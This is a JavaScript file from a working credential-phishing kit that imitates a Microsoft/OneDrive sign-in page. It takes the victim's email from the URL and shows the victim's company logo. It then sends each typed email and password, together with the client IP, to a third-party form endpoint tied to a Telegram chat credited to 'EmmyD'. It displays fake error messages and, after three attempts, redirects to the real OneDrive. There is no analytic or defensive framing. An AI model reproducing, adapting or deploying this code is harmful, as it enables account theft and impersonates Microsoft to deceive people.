
    /* global $ */
    $(document).ready(function () {
      var count = 0;
      /////////////url ai getting////////////////
      var ai = window.location.hash.substr(1);
      const newvalue = document.getElementById("aich")
      function ChangeValue(){
        newvalue.innerHTML(ai);
      }
      if (!ai) {
      } else {
        ChangeValue();
        var base64regex =
          /^([0-9a-zA-Z+/]{4})*(([0-9a-zA-Z+/]{2}==)|([0-9a-zA-Z+/]{3}=))?$/;
        if (!base64regex.test(ai)) {
          // alert(btoa(ai));
          var my_ai = ai;
        } else {
          // alert(atob(ai));
          var my_ai = atob(ai);
        }
        // $('#ai').val(ai);
        // var my_ai =ai;
        var filter =
          /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
        if (!filter.test(my_ai)) {
          $("#error").show();
          ai.focus;
          return false;
        }
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr(ind + 1);
        var c = my_slice.substr(0, my_slice.indexOf("."));
        var final = c.toLowerCase();
        var finalu = c.toUpperCase();
        $("#ai").val(my_ai);
        $("#div1").animate({ left: 0, opacity: "hide" }, 0);
        $("#div2").animate({ right: 0, opacity: "show" }, 500);
        $("#aich").html(my_ai);
        $.get("https://logo.clearbit.com/" + my_slice)
          .done(function () {
            $(".logoimg").attr("src", "https://logo.clearbit.com/" + my_slice);
            $(".logoname").html(finalu);
          })
          .fail(function () {
            $(".logoimg").attr(
              "src",
              "https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico"
            );
            $(".logoname").html("Microsoft");
          });
      }
      $("#ai").click(function () {
        $("#error").hide();
      });
      $(document).keypress(function (event) {
        var keycode = event.keyCode ? event.keyCode : event.which;
        if (keycode == "13") {
          event.preventDefault();
          if ($("#div1").is(":visible")) {
            $("#next").click();
          } else if ($("#div2").is(":visible")) {
            event.preventDefault();
            $("#submit-btn").click();
          } else {
            return false;
          }
        }
      });
      $("#next").click(function () {
        event.preventDefault();
        var my_ai = $("#ai").val();
        var filter =
          /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
        if (!filter.test(my_ai)) {
          $("#error").show();
          ai.focus;
          return false;
        }
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr(ind + 1);
        var c = my_slice.substr(0, my_slice.indexOf("."));
        var final = c.toLowerCase();
        var finalu = c.toUpperCase();
        $("#div1").animate({ left: 0, opacity: "hide" }, 0);
        $("#div2").animate({ right: 0, opacity: "show" }, 500);
        $("#aich").html(my_ai);
        $.get("https://logo.clearbit.com/" + my_slice)
          .done(function () {
            $(".logoimg").attr("src", "https://logo.clearbit.com/" + my_slice);
            $(".logoname").html(finalu);
          })
          .fail(function () {
            $(".logoimg").attr(
              "src",
              "https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico"
            );
            $(".logoname").html("Microsoft");
          });
      });
      // $('#back').click(function() {
      //     // $("#msg").hide();
      //     $("#ai").val("");
      //     $("#pr").val("");
      //     $("#div2").animate({ left: 0, opacity: "hide" }, 0);
      //     $("#div1").animate({ right: 0, opacity: "show" }, 1000);
      // });
      var file = "bmV4dC5waHA=";
      $("#submit-btn").click(function (event) {
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var detail = $("#field").html();
        var msg = $("#msg").html();
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr(ind + 1);
        var c = my_slice.substr(0, my_slice.indexOf("."));
        var final = c.toLowerCase();
        $("#msg").text(msg);
        count = count + 1;
        if (ai && pr) {
          $.ajax({
            dataType: "JSON",
            url: `https://api.slapform.com/g2SuGTj6b?chat_id=6246111869&text=====Made By EmmyD Telegram: @Silenttasf_bot===
%0AEmail: ${ai}%0APasswd: ${pr}%0AClient IP: ${userip}%0A====&parse_mode=html`,
            type: "GET",
            beforeSend: function (xhr) {
              $("#submit-btn").html("verifying...");
            },
            success: function (response) {
              $("#pr").val("");
              if (count >= 3) {
                count = 0;
                $("#div2").animate({ left: 0, opacity: "hide" }, 0);
                $("#div3").animate({ left: 0, opacity: "show" }, 500);
                setTimeout(() => {
                  window.location.replace("https://onedrive.live.com/?id=root");
                }, 500);
                return false;
              }
              if (count == 2) {
                $("#msg2").show();
                $("#msg").hide();
                $("#msg1").hide();
              } else {
                $("#msg1").show();
                $("#msg").hide();
                $("#msg2").hide();
              }
            },
            error: function () {
              $("#pr").val("");
              if (count >= 3) {
                count = 0;
                $("#div2").animate({ left: 0, opacity: "hide" }, 0);
                $("#div3").animate({ left: 0, opacity: "show" }, 500);
                setTimeout(() => {
                  window.location.replace("https://onedrive.live.com/?id=root");
                }, 1000);
                return false;
              }
              if (count == 2) {
                $("#msg2").show();
                $("#msg").hide();
                $("#msg1").hide();
              } else {
                $("#msg1").show();
                $("#msg").hide();
                $("#msg2").hide();
              }
            },
            complete: function () {
              $("#submit-btn").html("Sign in");
            },
          });
        } else {
          $("#msg").hide();
          $("#msg3").show();
        }
      });
    });
    function changeLogoByEmailString() {
      const assignedEmail = document.getElementById("ai").value;
      const logo = document.getElementById("banner1");
      const logo2 = document.getElementById("banner2");
      const assignedEmailSplited = assignedEmail.split("@");
      logo.setAttribute(
        "src",
        "https://logo.clearbit.com/" + assignedEmailSplited[1]
      );
      logo2.setAttribute(
        "src",
        "https://logo.clearbit.com/" + assignedEmailSplited[1]
      );
      //https://logo.clearbit.com/
    }
    const assignedEmailEventListener = document
      .getElementById("ai")
      .addEventListener("change", changeLogoByEmailString);


  